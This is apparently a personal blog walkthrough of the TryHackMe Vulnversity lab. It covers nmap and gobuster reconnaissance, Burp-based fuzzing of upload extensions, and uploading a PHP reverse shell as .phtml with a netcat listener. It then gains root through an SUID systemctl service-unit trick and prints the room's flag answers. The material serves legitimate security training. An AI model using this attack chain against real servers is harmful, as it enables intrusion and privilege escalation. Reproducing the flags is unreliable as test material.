TryHackMe CTF: Vulnversity  –  Walkthrough

December 12, 2024
December 12, 2024 Jasper
Hi! It is time to look at the Vulnversity CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms.

Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Vulnversity  TryHackMe room

Room URL: https://tryhackme.com/room/vulnversity


Task 1 (Deploy the machine)

Deploy the machine and move on!

Questions

Deploy the machine

Answer: No answer needed


Task 2 (Reconnaissance)

Gather information about this machine using a network scanning tool called nmap. Check out the Nmap room for more on this!

Don’t have a Linux machine with nmap on? Deploy your own AttackBox and control it with your browser.

nmap is an free, open-source and powerful tool used to discover hosts and services on a computer network. In our example, we are using nmap to scan this machine to identify all services that are running on a particular port.

Common nmap flag descriptions

  • -sV: Attempts to determine the version of the services running
  • -p <x> or -p-: Port scan for port <x> or scan all ports
  • -Pn: Disable host discovery and just scan for open ports
  • -A: Enables OS and version detection, executes in-build scripts for further enumeration –
  • sC: Scan with the default nmap scripts
  • -v: Verbose mode
  • -sU: UDP port scan
  • -sS TCP SYN port scan

Questions

Scan this box: nmap -sV <machines ip>

You could definately use the above command, but that would limit the scan to version detection. I will instead use:

nmap -A -sC -p- <target ip>

This gives us a bunch more information (for example on operating systems), and runs some basic scripts as well. Bear in mind, it will be a lot slower.

The open ports, OS and version info are as follows:

Nmap open ports

And the script results:

Nmap script results

Answer: No answer needed

Scan the box, how many ports are open?

See above. The answer is is six.

Answer: 6

What version of the squid proxy is running on the machine?

The answer to this question is on the first screenshot as well. On port 3128 we have squid proxy version 3.5.12 running.

Answer: 3.5.12

How many ports will nmap scan if the flag -p-400 was used?

This flag will run all ports from 1 through 400. Source: https://nmap.org/book/port-scanning-options.html

Answer: 400

Using the nmap flag -n what will it not resolve?

With the n flag set, nmap will not resolve DNS. Source:
https://nmap.org/book/man-briefoptions.html

Answer: DNS

What is the most likely operating system this machine is running?

On the both screen Ubuntu gets mentioned multiple times!

Answer: Ubuntu

What port is the web server running on?

This is port 3333. We can open it in the browser:

Visiting the webpage

This is pretty special, as normally websites run on port 80 (HTTP) or port 443 (HTTPS).

Answer: 3333

Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

Answer: No answer needed


Task 3 (Locating directories using Gobuster)

Using a fast directory discovery tool called GoBuster you will locate a directory that you can use to upload a shell to.

Lets first start of by scanning the website to find any hidden directories. To do this, we’re going to use GoBuster.

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

Download GoBuster here, or if you’re on Kali Linux 2020.1+ run sudo apt-get install gobuster

To get started, you will need a wordlist for GoBuster (which will be used to quickly go through the wordlist to identify if there is a public directory available. If you are using Kali Linux you can find many wordlists under /usr/share/wordlists.

GoBuster flagDescription

  • -ePrint: the full URLs in your console
  • -uThe: target URL
  • -wPath: to your wordlist
  • -U and -P: Username and Password for Basic Auth
  • -p <x>: Proxy to use for requests
  • -c <http cookies>: Specify a cookie for simulating your auth

Questions

Now lets run GoBuster with a wordlist: gobuster dir -u http://<ip>:3333 -w <word list location>

I decided to go with the following command and wordlist:

gobuster dir -u

http://10.10.109.122:3333

 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This gives the following result:

Gobuster results

Internal seems interesting. Answer: No answer needed

What is the directory that has an upload form page?

If we visit the internal page on the browser we get the following:

Finding the internal upload page

Hurrah!

Answer: /internal/


Task 4 (Compromise the webserver)

Now you have found a form to upload files, we can leverage this to upload and execute our payload that will lead to compromising the web server.

Questions

Try upload a few file types to the server, what common extension seems to be blocked?

I have played around with some extension, but the correct answer to this question seems to be php.

I found the following payload: https://github.com/pentestmonkey/php-reverse-shell

And tried to upload it:

Trying to upload the php reverse shell

Note: To figure out the prorgramming language running the website you can use Wappalyzer, which can be run as Firefox plugin.

Wappalyzer information

Answer: php

To identify which extensions are not blocked, we’re going to fuzz the upload form. To do this, we’re going to use BurpSuite. If you are unsure to what BurpSuite is, or how to set it up please complete our BurpSuite room first.

Answer: No answer needed

We’re going to use Intruder (used for automating customised attacks).

To begin, make a wordlist with the following extensions: in: .php, .php3, .php4, .php5, .phtml

Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file, once this request is captured, send it to the Intruder. Click on “Payloads” and select the “Sniper” attack type. Click the “Positions” tab now, find the filename and “Add §” to the extension:

Editing the extension by using a payload

Run this attack, what extension is allowed?

I hope you understand the above instruction. We basically start running our Burp Suite proxy, and while it is ready to intercept we post the internal form. We can then intercept this request, and right click it to send it to Intruder. Here we can edit the payload to make sure we try different file format when uploading our shell script.

What THM fails to mention is that you also need to set the payload type to a simple list and then add the file extensions under the options:

Setting the payload options

IMPORTANT: You need to deselect payload encoding, otherwise this step does not work.

Disabling payload encoding

Now you can run the attack! We can see that all requests return 200, but one of them has a different response length.

Finding the acceptable file extension

If you click on the response from the .phtml payload you can see it returns success!

Answer: .phtml

Now we know what extension we can use for our payload we can progress.We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you’ll listen for incoming connections, upload and have your shell executed which will beacon out to you to control!

Download the following reverse PHP shell here.

To gain remote access to this machine, follow these steps:

  1. Edit the php-reverse-shell.php file and edit the ip to be your attacker machine ip.

Rename this file to php-reverse-shell.phtml. You can do this by running:

mv php-reverse-shell.php php-reverse-shell.phtml

2. We’re now going to listen to incoming connections using netcat. Run the following command:

nc -lvnp 1234

3. Upload your shell and navigate to http://<target ip>:3333/internal/uploads/php-reverse-shell.phtml — This will execute your payload

4. You should see a connection on your netcat session

Gaining a connection!

Note: remember to shut down your Burp Suite interceptor!

Answer: No answer needed

What is the name of the user who manages the webserver?

Have a look at the home directory 🙂

Looking in the home directory

There is a home directory for bill here!

Answer: bill

What is the user flag?

Finding the user flag

There is a file called user.txt in bill’s home directory.

Answer: 8bd7992fbe8a6ad22a63361004cfcedb


Task 5 (Privilege Escalation)

Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.

Questions

On the system, search for all SUID files. What file stands out?

We can use the following command to list SUID files:

find / -user root -perm -4000 -exec ls -ldb {} \;

/bin/systemctl stands out, at it is used to control and monitor services!

Answer: /bin/systemctl

Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer? Become root and get the last flag (/root/root.txt)

We can find some more info on GTFObins:
https://gtfobins.github.io/gtfobins/systemctl/#suid

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

This is pretty complicated! What we do is creating a service, which reads the root flag and outputs it to /tmp/output. This service is saved in a variable called TF. Finally, we run the service.

Proceed by reading the /tmp/output file and you will find the key!

Answer: a58ff8579f0a9270368d33a9966c7fd5

Well… we did not get root did we now?

I just wanted you to show you a simple case first before showing you how to get root. The principle is basically the same. But instead of writing:

ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output on line 4 we write the following:

ExecStart=/bin/sh -c “chmod +s /bin/bash”

Which is similar in the way that we start up a shell, but instead of outputting the flag to a text file, we instead give ourselves execute privileges on bash.

systemctl exploit

We can then run bash by running:

bash -p

The p flag means we are running it privileged.

Gaining root access!

We are done! Great job everyone on this Vulnversity room on TryHackMe! Give me a clap if you enjoyed this article 🙂


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

Leave a Reply

Your email address will not be published. Required fields are marked *